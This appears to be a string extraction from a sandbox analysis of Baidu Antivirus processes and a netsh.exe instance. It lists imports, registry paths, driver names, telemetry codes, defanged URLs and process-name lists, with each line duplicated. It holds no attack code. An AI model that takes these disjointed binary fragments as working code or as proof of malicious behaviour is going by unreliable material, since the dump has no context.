\bdkvrtpplugins\RtpContainerConfig.xml
C:\test.exe
C:\test.exe
d-d-d d:d:d d
d-d-d d:d:d d
d:d:d
d:d:d
%s(%d)
%s(%d)
Last Error : %u(%s)
Last Error : %u(%s)
\BDMAVE.dll
\BDMAVE.dll
Global\BDKVMutex{32EB1BC7-A5CD-4356-A6B1-54D7BF690CA7}
Global\BDKVMutex{32EB1BC7-A5CD-4356-A6B1-54D7BF690CA7}
JoinBaiduCloundPlan
JoinBaiduCloundPlan
\kernel32.dll
\kernel32.dll
Windows 8.1
Windows 8.1
Windows 8.0
Windows 8.0
Windows 7
Windows 7
Windows Vista
Windows Vista
Windows 7
Windows 7
Windows Vista
Windows Vista
Windows Server 2003,
Windows Server 2003,
Windows XP
Windows XP
Windows 2000
Windows 2000
Windows NT
Windows NT
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
Windows 95
Windows 95
Windows 98
Windows 98
Windows ME
Windows ME
000%x
000%x
\StringFileInfo\%s\FileVersion
\StringFileInfo\%s\FileVersion
BaiduSdUpdate.exe
BaiduSdUpdate.exe
CX
CX
{X-X-X-XX-XXXXXX}
{X-X-X-XX-XXXXXX}
CD823ABCA-A92F-429d-9E11-3779B5F682AA
CD823ABCA-A92F-429d-9E11-3779B5F682AA
BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}
BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}
BDMUpdate.dll
BDMUpdate.dll
BDMNet.dll
BDMNet.dll
.bdtmp
.bdtmp
.old_
.old_
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
kernel32.dll
kernel32.dll
\Global.db
\Global.db
Aiphlpapi.dll
Aiphlpapi.dll
A\\.\PhysicalDrive%d
A\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
BHKEY_LOCAL_MACHINE
BHKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
oHKEY_USERS
oHKEY_USERS
Wintrust.dll
Wintrust.dll
Crypt32.dll
Crypt32.dll
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\SystemCertificates\
Software\Microsoft\SystemCertificates\
Software\Microsoft\EnterpriseCertificates\
Software\Microsoft\EnterpriseCertificates\
system32\winlogon.exe
system32\winlogon.exe
D6BE417DD-264A-4678-A036-74D2173ECCEB
D6BE417DD-264A-4678-A036-74D2173ECCEB
2.1.0.3109
2.1.0.3109
BaidusdSvc.exe
BaidusdSvc.exe
netsh.exe_2640:
.text
.text
`.data
`.data
.rsrc
.rsrc
msvcrt.dll
msvcrt.dll
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
MPRAPI.dll
MPRAPI.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
RASAPI32.dll
RASAPI32.dll
USER32.dll
USER32.dll
iphlpapi.dll
iphlpapi.dll
[%S] %S
[%S] %S
netsh.pdb
netsh.pdb
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
GetProcessHeap
GetProcessHeap
GetConsoleOutputCP
GetConsoleOutputCP
ntdll.dll
ntdll.dll
NETSH.EXE
NETSH.EXE
MatchCmdLine
MatchCmdLine
MatchTagsInCmdLine
MatchTagsInCmdLine
{X-X-X-XX-XXXXXX}
{X-X-X-XX-XXXXXX}
netsh.exe
netsh.exe
Error %d in FormatMessageW()
Error %d in FormatMessageW()
select * from Win32_OperatingSystem
select * from Win32_OperatingSystem
\\%s\root\cimv2
\\%s\root\cimv2
5.1.2600.5512 (xpsp.080413-0852)
5.1.2600.5512 (xpsp.080413-0852)
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
LFirst, add the protocol to the transport, and then add it to the interface.
LFirst, add the protocol to the transport, and then add it to the interface.
*The requested transport is not available.
*The requested transport is not available.
%1!s! ipmontr.dll
%1!s! ipmontr.dll
The above command installs ipmontr.dll in netsh.
The above command installs ipmontr.dll in netsh.
is removed, it is no longer supported by netsh.
is removed, it is no longer supported by netsh.
The command cannot be executed.
The command cannot be executed.
*Windows cannot open the file named %1!s!.
*Windows cannot open the file named %1!s!.
.The commit call to %1!s! cannot be completed.
.The commit call to %1!s! cannot be completed.
.Sets the current machine on which to operate.
.Sets the current machine on which to operate.
name - Name of the machine on which to operate
name - Name of the machine on which to operate
Sets the current machine on which to operate. If a machine name
Sets the current machine on which to operate. If a machine name
%1!s! open c:\logfiles\logfile.txt
%1!s! open c:\logfiles\logfile.txt
.Error creating key for %1!s! in the registry.
.Error creating key for %1!s! in the registry.
.Error deleting key for %1!s! in the registry.
.Error deleting key for %1!s! in the registry.
BaiduSdTray.exe_2844:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
PSSSSSSh
PSSSSSSh
D$XPSSh
D$XPSSh
..\src\google\protobuf\message_lite.cc
..\src\google\protobuf\message_lite.cc
CHECK failed: !coded_out.HadError():
CHECK failed: !coded_out.HadError():
..\src\google\protobuf\io\coded_stream.cc
..\src\google\protobuf\io\coded_stream.cc
%d.%d.%d
%d.%d.%d
libprotobuf %s %s:%d] %s
libprotobuf %s %s:%d] %s
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
inflate 1.2.5 Copyright 1995-2010 Mark Adler
inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
1.2.5
{C6642F75-8DBE-473d-A98B-940F84EF702C}
{C6642F75-8DBE-473d-A98B-940F84EF702C}
.\Global\ReportBase\msg.pb.cc
.\Global\ReportBase\msg.pb.cc
datapkg.FieldsList
datapkg.FieldsList
datapkg.DataType
datapkg.DataType
CreateReportClient
CreateReportClient
ReleaseReportClient
ReleaseReportClient
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
kernel32.dll
kernel32.dll
X;
X;
%s>
%s>
%s="%s"
%s="%s"
%s='%s'
%s='%s'
version="%s"
version="%s"
encoding="%s"
encoding="%s"
standalone="%s"
standalone="%s"
1.0.1.1
1.0.1.1
%d.%d
%d.%d
d-d-d d:d:d
d-d-d d:d:d
RegKey
RegKey
RootKey
RootKey
SubKey
SubKey
IsNative64Key
IsNative64Key
CryptMsgGetParam
CryptMsgGetParam
CryptMsgClose
CryptMsgClose
CertFindCertificateInStore
CertFindCertificateInStore
CertFreeCertificateContext
CertFreeCertificateContext
CertCloseStore
CertCloseStore
CertGetNameStringW
CertGetNameStringW
CryptCATCatalogInfoFromContext
CryptCATCatalogInfoFromContext
Content-Length:%d
Content-Length:%d
s.x.baidu.com
s.x.baidu.com
c:\clientci\workspace\bdkv_v2.1_fix_compile\avmain_proj\Source\MiniUpdate\thirdparty\google/protobuf/repeated_field.h
c:\clientci\workspace\bdkv_v2.1_fix_compile\avmain_proj\Source\MiniUpdate\thirdparty\google/protobuf/repeated_field.h
c:\clientci\workspace\bdkv_v2.1_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
c:\clientci\workspace\bdkv_v2.1_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
.\update.pb.cc
.\update.pb.cc
%s:%u
%s:%u
%u.%u.%u.%u
%u.%u.%u.%u
addr %s not good...
addr %s not good...
Unsupported Media Type
Unsupported Media Type
HTTP Version not supported
HTTP Version not supported
HTTP/1.0
HTTP/1.0
HTTP/1.1
HTTP/1.1
1.0.0.1
1.0.0.1
.\header.pb.cc
.\header.pb.cc
https
https
ftpes
ftpes
ftps
ftps
tftp
tftp
% ;?:@=&,$/-_!.~*()
% ;?:@=&,$/-_!.~*()
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
%s\Connection
c:\clientci\workspace\bdkv_v2.1_fix_compile\basic\KVOutput\binrelease\BaiduSdTray.pdb
c:\clientci\workspace\bdkv_v2.1_fix_compile\basic\KVOutput\binrelease\BaiduSdTray.pdb
BDMSkin.dll
BDMSkin.dll
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
BDLogicUtils.dll
BDMFrameWork.dll
BDMFrameWork.dll
SHDeleteKeyW
SHDeleteKeyW
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
SetProcessShutdownParameters
SetProcessShutdownParameters
GetWindowsDirectoryW
GetWindowsDirectoryW
GetSystemWindowsDirectoryW
GetSystemWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegOpenKeyW
RegOpenKeyW
RegCreateKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegFlushKey
RegFlushKey
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
RegSetKeySecurity
RegSetKeySecurity
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegGetKeySecurity
RegGetKeySecurity
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteExW
ShellExecuteExW
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
MSVCP80.dll
MSVCP80.dll
MSVCR80.dll
MSVCR80.dll
_amsg_exit
_amsg_exit
_wcmdln
_wcmdln
_crt_debugger_hook
_crt_debugger_hook
PSAPI.DLL
PSAPI.DLL
WTSAPI32.dll
WTSAPI32.dll
USERENV.dll
USERENV.dll
imagehlp.dll
imagehlp.dll
HttpSendRequestW
HttpSendRequestW
InternetCrackUrlW
InternetCrackUrlW
HttpOpenRequestW
HttpOpenRequestW
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
NETAPI32.dll
NETAPI32.dll
VERSION.dll
VERSION.dll
WS2_32.dll
WS2_32.dll
RegOpenKeyExA
RegOpenKeyExA
BaiduSdTray.exe
BaiduSdTray.exe
.?AVCBDMLauchReportRecord@@
.?AVCBDMLauchReportRecord@@
.?AVReportMessageBase@ns_reportbase@ns_global@@
.?AVReportMessageBase@ns_reportbase@ns_global@@
.?AVRegSystemCallPassThrough@ns_common@@
.?AVRegSystemCallPassThrough@ns_common@@
.?AVReportClient@ns_reportbase@ns_global@@
.?AVReportClient@ns_reportbase@ns_global@@
.?AVTSMsg@@
.?AVTSMsg@@
.?AVIBDMMsg@@
.?AVIBDMMsg@@
.?AVTSMsgMap@@
.?AVTSMsgMap@@
.?AVITSMsgMap@@
.?AVITSMsgMap@@
.?AVTSMsgDispatcher@@
.?AVTSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVTSMsgStub@@
.?AVTSMsgStub@@
.?AVITSMsgStub@@
.?AVITSMsgStub@@
.?AVheader@http@bena@@
.?AVheader@http@bena@@
.?AVresponse@http@bena@@
.?AVresponse@http@bena@@
.?AVrequest@http@bena@@
.?AVrequest@http@bena@@
1%1X1u1{1
1%1X1u1{1
7-8}8&9S9x9
7-8}8&9S9x9
1/3E4
1/3E4
9 :-:3:|:
9 :-:3:|:
2!313\3|3
2!313\3|3
5%5X5l5|5
5%5X5l5|5
11U1]1q1
11U1]1q1
77q7
77q7
:,:6:>:`:
:,:6:>:`:
7&747=7]7
7&747=7]7
?0?4?8?
?0?4?8?
6$6,686\6|6
6$6,686\6|6
1$1,181\1|1
1$1,181\1|1
5 5$5(5,5054585\5
5 5$5(5,5054585\5
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
\iexplore.exe
\iexplore.exe
\Internet Explorer\iexplore.exe
\Internet Explorer\iexplore.exe
%s\baidubrowser.exe
%s\baidubrowser.exe
HKEY_LOCAL_MACHINE\Software
HKEY_LOCAL_MACHINE\Software
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\DirectShow
HKEY_CURRENT_USER\Software\Classes\DirectShow
HKEY_CURRENT_USER\Software\Classes\Interface
HKEY_CURRENT_USER\Software\Classes\Interface
HKEY_CURRENT_USER\Software\Classes\Media Type
HKEY_CURRENT_USER\Software\Classes\Media Type
HKEY_CURRENT_USER\Software\Classes\MediaFoundation
HKEY_CURRENT_USER\Software\Classes\MediaFoundation
HKEY_CLASSES_ROOT\CLSID
HKEY_CLASSES_ROOT\CLSID
HKEY_CLASSES_ROOT\DirectShow
HKEY_CLASSES_ROOT\DirectShow
HKEY_CLASSES_ROOT\Interface
HKEY_CLASSES_ROOT\Interface
HKEY_CLASSES_ROOT\Media Type
HKEY_CLASSES_ROOT\Media Type
HKEY_CLASSES_ROOT\MediaFoundation
HKEY_CLASSES_ROOT\MediaFoundation
HKEY_LOCAL_MACHINE\Software\Wow6432Node
HKEY_LOCAL_MACHINE\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation
HKEY_CLASSES_ROOT\Wow6432Node\CLSID
HKEY_CLASSES_ROOT\Wow6432Node\CLSID
HKEY_CLASSES_ROOT\Wow6432Node\DirectShow
HKEY_CLASSES_ROOT\Wow6432Node\DirectShow
HKEY_CLASSES_ROOT\Wow6432Node\Interface
HKEY_CLASSES_ROOT\Wow6432Node\Interface
HKEY_CLASSES_ROOT\Wow6432Node\Media Type
HKEY_CLASSES_ROOT\Wow6432Node\Media Type
HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation
HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation
%d.%d.%d.%d
%d.%d.%d.%d
ntdll.dll
ntdll.dll
EXPLORER.EXE
EXPLORER.EXE
explorer.exe
explorer.exe
UDP-ADM_DRVE_ISTL_FID
UDP-ADM_DRVE_ISTL_FID
UDP-ADM_DRVE_OPEN_FID
UDP-ADM_DRVE_OPEN_FID
bdmantivirus\BDKitUtils.dll
bdmantivirus\BDKitUtils.dll
system32\DRIVERS\BDMWrench.sys
system32\DRIVERS\BDMWrench.sys
BDMNet.dll
BDMNet.dll
BaiduHips.exe
BaiduHips.exe
BaiduSdSvc.exe
BaiduSdSvc.exe
"%s\BaiduSdSvc.exe" -r
"%s\BaiduSdSvc.exe" -r
%Program Files% (x86)\Baidu
%Program Files% (x86)\Baidu
%Program Files%\Baidu
%Program Files%\Baidu
D:\Program Files (x86)\Baidu
D:\Program Files (x86)\Baidu
D:\Program Files\Baidu
D:\Program Files\Baidu
E:\Program Files (x86)\Baidu
E:\Program Files (x86)\Baidu
E:\Program Files\Baidu
E:\Program Files\Baidu
F:\Program Files (x86)\Baidu
F:\Program Files (x86)\Baidu
F:\Program Files\Baidu
F:\Program Files\Baidu
BaiduAnSvc.exe
BaiduAnSvc.exe
"%s\BaiduAnSvc.exe" -r
"%s\BaiduAnSvc.exe" -r
BDMReport.dll
BDMReport.dll
%s\baidu\baiduan\Config\8001.dat
%s\baidu\baiduan\Config\8001.dat
BaiduAnTray.exe
BaiduAnTray.exe
%s\BaiduHips.exe
%s\BaiduHips.exe
BaiduProtect.exe
BaiduProtect.exe
"%s\BaiduProtect.exe" -r
"%s\BaiduProtect.exe" -r
%Program Files% (x86)\Common Files\Baidu
%Program Files% (x86)\Common Files\Baidu
%Program Files%\Common Files\Baidu
%Program Files%\Common Files\Baidu
D:\Program Files (x86)\Common Files\Baidu
D:\Program Files (x86)\Common Files\Baidu
D:\Program Files\Common Files\Baidu
D:\Program Files\Common Files\Baidu
E:\Program Files (x86)\Common Files\Baidu
E:\Program Files (x86)\Common Files\Baidu
E:\Program Files\Common Files\Baidu
E:\Program Files\Common Files\Baidu
F:\Program Files (x86)\Common Files\Baidu
F:\Program Files (x86)\Common Files\Baidu
F:\Program Files\Common Files\Baidu
F:\Program Files\Common Files\Baidu
%s\baidu\baidusd\Config\900.dat
%s\baidu\baidusd\Config\900.dat
\\.\BDMWrench
\\.\BDMWrench
Global\BDDefenseDriver{80438582-0F66-44E0-3D2B-2D7E872CBFBB}
Global\BDDefenseDriver{80438582-0F66-44E0-3D2B-2D7E872CBFBB}
CD61BB3A-403D-7650-5D9A-4E57EA1035E6
CD61BB3A-403D-7650-5D9A-4E57EA1035E6
UDP-ADM_KITUTL_PH_SET_INVALID
UDP-ADM_KITUTL_PH_SET_INVALID
UDP-ADM_WMWCH_PH_SET_INVALID
UDP-ADM_WMWCH_PH_SET_INVALID
UDP-ADM_ST_ID:%d
UDP-ADM_ST_ID:%d
UDP-ADM_DRVE_RUN
UDP-ADM_DRVE_RUN
UDP-ADM_CLIENT_RUN
UDP-ADM_CLIENT_RUN
UDP-ADM_CPY_SYS_FID
UDP-ADM_CPY_SYS_FID
UDP-ADM_OPEN_SYS_FID
UDP-ADM_OPEN_SYS_FID
UDP-ADM_INST_SYS_FID
UDP-ADM_INST_SYS_FID
UDP-ADM_SED_PAVER_FID
UDP-ADM_SED_PAVER_FID
UDP-ADM_ATR_SET
UDP-ADM_ATR_SET
UDP-ADM_SED_ATR_FID
UDP-ADM_SED_ATR_FID
UDP-ADM_SED_FSD
UDP-ADM_SED_FSD
UDP-ADM_RPT_FID
UDP-ADM_RPT_FID
UDP-ADM_FSD
UDP-ADM_FSD
\BaiduSdSvc.exe
\BaiduSdSvc.exe
\BaiduAnSvc.exe
\BaiduAnSvc.exe
UDP-ADM_RPT_INIT_FID
UDP-ADM_RPT_INIT_FID
\system32\drivers\BDMWrench.sys
\system32\drivers\BDMWrench.sys
drivers\BDMWrench.sys
drivers\BDMWrench.sys
UDP-EVT_WFR
UDP-EVT_WFR
UDP-EVT_WFID
UDP-EVT_WFID
UDP-ADM_SED_PAVER2_FID
UDP-ADM_SED_PAVER2_FID
\BaiduSdTray.exe" -stmd=3
\BaiduSdTray.exe" -stmd=3
\BaiduAnTray.exe" -stmd=3
\BaiduAnTray.exe" -stmd=3
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
xx
xx
C9521EC1-6642-5CF6-8FB9-DE04639593BD
C9521EC1-6642-5CF6-8FB9-DE04639593BD
UDP-PS_KITUTI_PH_SET_INVALID
UDP-PS_KITUTI_PH_SET_INVALID
UDP-PS_LD_FID
UDP-PS_LD_FID
UDP-PL_SRV_ID:%d
UDP-PL_SRV_ID:%d
UDP-PL_SRV_RUN
UDP-PL_SRV_RUN
UDP-PL_SRV_INSTPH_FID
UDP-PL_SRV_INSTPH_FID
UDP-PL_SRV_CK_REG_DAMG
UDP-PL_SRV_CK_REG_DAMG
UDP-PL_SRV_REPT01_FID
UDP-PL_SRV_REPT01_FID
UDP-PL_SRV_REGREPIR_FID
UDP-PL_SRV_REGREPIR_FID
UDP-PL_SRV_PL_FID
UDP-PL_SRV_PL_FID
UDP-PL_SRV_REPT02_FID
UDP-PL_SRV_REPT02_FID
UDP-PL_SRV_FSD
UDP-PL_SRV_FSD
UDP-PL_TRY_ID:%d
UDP-PL_TRY_ID:%d
UDP-PL_TRY_RUN
UDP-PL_TRY_RUN
UDP-PL_TRY_INSTPH_FID
UDP-PL_TRY_INSTPH_FID
UDP-PL_TRY_UN_ATRUN
UDP-PL_TRY_UN_ATRUN
UDP-PL_TRY_REPT01_FID
UDP-PL_TRY_REPT01_FID
UDP-PL_TRY_PL_FID
UDP-PL_TRY_PL_FID
UDP-PL_TRY_REPT02_FID
UDP-PL_TRY_REPT02_FID
UDP-PL_TRY_FSD
UDP-PL_TRY_FSD
UDP-PL_RPT_INIT_FID
UDP-PL_RPT_INIT_FID
UDP-ADM_SET_KITU
UDP-ADM_SET_KITU
UDP-ADM_SET_MWR_PATH
UDP-ADM_SET_MWR_PATH
UDP-ADM_OS_ERR
UDP-ADM_OS_ERR
UDP-ADM_PROC_DIR_UN_EXIST
UDP-ADM_PROC_DIR_UN_EXIST
UDP-ADM_PROC_GT_VER_FID
UDP-ADM_PROC_GT_VER_FID
UDP-ADM_PROC_MATCH_FID
UDP-ADM_PROC_MATCH_FID
\BDConfig.dll
\BDConfig.dll
hh_debug:%s
hh_debug:%s
BaiduSdUpdate.exe
BaiduSdUpdate.exe
Wtsapi32.dll
Wtsapi32.dll
\BaiduAn.exe
\BaiduAn.exe
\BDKVRecomm.dll
\BDKVRecomm.dll
BDMgr.exe -stmd=6
BDMgr.exe -stmd=6
BDMgr.exe -stmd=7
BDMgr.exe -stmd=7
TrayPluginContainerConfig.xml
TrayPluginContainerConfig.xml
BDMgr.exe -stmd=7 -selplugin={914438D6-1EC4-434A-B6EC-20F84894C395}
BDMgr.exe -stmd=7 -selplugin={914438D6-1EC4-434A-B6EC-20F84894C395}
hXXp://anquan.baidu.com/bbs/forum.php?mod=post&action=newthread&fid=40
hXXp://anquan.baidu.com/bbs/forum.php?mod=post&action=newthread&fid=40
{E059A29F-D2ED-4f28-849A-851AA9D5A05C}
{E059A29F-D2ED-4f28-849A-851AA9D5A05C}
C:\test.txt
C:\test.txt
BarServer.exe|BarMonitor.exe|BarServerView.exe|BMServerManager.exe|BarClient.exe|BarClientView.exe|PersonUDisk.exe|BarClientSafeCenter.exe|EGUpgrader.exe|eyvncnbsvr.exe|EGVirtualDisk.exe|EGVncService.exe|EyooNetS.exe|Enjoytray.exe|EntDesktop.exe|eyuscore|eyoorun.exe|grb.exe|irsetup.exe|Gptsvr.exe|HINTAMPROXY.exe|HintClient.exe|HintBackup.exe|wxServer.exe|wxSysTray.exe|wxServerView.exe|clsmn.exe|DFServ.exe|FrzState2k.exe|PubwinCore.exe|PubwinPool.exe|Pubwin2007.exe|Pubwin2009.exe|xsMenu.exe|
BarServer.exe|BarMonitor.exe|BarServerView.exe|BMServerManager.exe|BarClient.exe|BarClientView.exe|PersonUDisk.exe|BarClientSafeCenter.exe|EGUpgrader.exe|eyvncnbsvr.exe|EGVirtualDisk.exe|EGVncService.exe|EyooNetS.exe|Enjoytray.exe|EntDesktop.exe|eyuscore|eyoorun.exe|grb.exe|irsetup.exe|Gptsvr.exe|HINTAMPROXY.exe|HintClient.exe|HintBackup.exe|wxServer.exe|wxSysTray.exe|wxServerView.exe|clsmn.exe|DFServ.exe|FrzState2k.exe|PubwinCore.exe|PubwinPool.exe|Pubwin2007.exe|Pubwin2009.exe|xsMenu.exe|
OUTLOOK.EXE|RTX.exe|Foxmail.exe|OfficeTask.exe|OfficeIm.exe|OfficeMail.exe|OfficeDaemon.exe|OfficeIndex.exe|OfficePOP3.exe|
OUTLOOK.EXE|RTX.exe|Foxmail.exe|OfficeTask.exe|OfficeIm.exe|OfficeMail.exe|OfficeDaemon.exe|OfficeIndex.exe|OfficePOP3.exe|
iNode Client.exe|8021x.exe|DrClient.exe|DrUpdate.exe|DrMain.exe|
iNode Client.exe|8021x.exe|DrClient.exe|DrUpdate.exe|DrMain.exe|
ic_danger.png
ic_danger.png
BaiduSdBugRpt.exe
BaiduSdBugRpt.exe
BaiduSd.exe
BaiduSd.exe
Client.exe
Client.exe
\GameNoDisturb.ini
\GameNoDisturb.ini
\PullUpConfig.xml
\PullUpConfig.xml
file='skin_1.png' xtiled='true' ytiled='true'
file='skin_1.png' xtiled='true' ytiled='true'
\BaiduSdSvc.exe -m "
\BaiduSdSvc.exe -m "
\cmd.exe
\cmd.exe
Shell32.dll
Shell32.dll
\BaiduSd.exe
\BaiduSd.exe
-selplugin=rdp_scan -vll=%s
-selplugin=rdp_scan -vll=%s
BaiduSd{D8A4131D-3A7A-48a1-B080-28E1DC04F7C2}
BaiduSd{D8A4131D-3A7A-48a1-B080-28E1DC04F7C2}
100012_1
100012_1
CheckIco_Select_hor.png
CheckIco_Select_hor.png
CheckIco.png
CheckIco.png
ic_menu_logo_hor.png
ic_menu_logo_hor.png
CheckIco_hor.png
CheckIco_hor.png
CheckIco_Select.png
CheckIco_Select.png
MainIco_hor.png
MainIco_hor.png
ic_menu_logo.png
ic_menu_logo.png
MainIco.png
MainIco.png
menu.xml
menu.xml
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduSd
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduSd
2.1.0.3086
2.1.0.3086
hXXp://anquan.baidu.com/shadu
hXXp://anquan.baidu.com/shadu
hXXp://shadu.baidu.com/privacy.html
hXXp://shadu.baidu.com/privacy.html
about.xml
about.xml
@advapi32.dll
@advapi32.dll
JoinBaiduCloundPlan
JoinBaiduCloundPlan
SWITCH_CENTER_URLSAFE
SWITCH_CENTER_URLSAFE
000%x
000%x
\StringFileInfo\%s\FileVersion
\StringFileInfo\%s\FileVersion
ABDKVMainframe.dll
ABDKVMainframe.dll
BDCooly.dll
BDCooly.dll
A\\.\pipe\{5EA6312A-0014-4160-AF85-E26361D6281E}
A\\.\pipe\{5EA6312A-0014-4160-AF85-E26361D6281E}
\StringFileInfo\xx\FileVersion
\StringFileInfo\xx\FileVersion
\kernel32.dll
\kernel32.dll
Windows 8.1
Windows 8.1
Windows 8.0
Windows 8.0
Windows 7
Windows 7
Windows Vista
Windows Vista
Windows 7
Windows 7
Windows Vista
Windows Vista
Windows Server 2003,
Windows Server 2003,
Windows XP
Windows XP
Windows 2000
Windows 2000
Windows NT
Windows NT
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
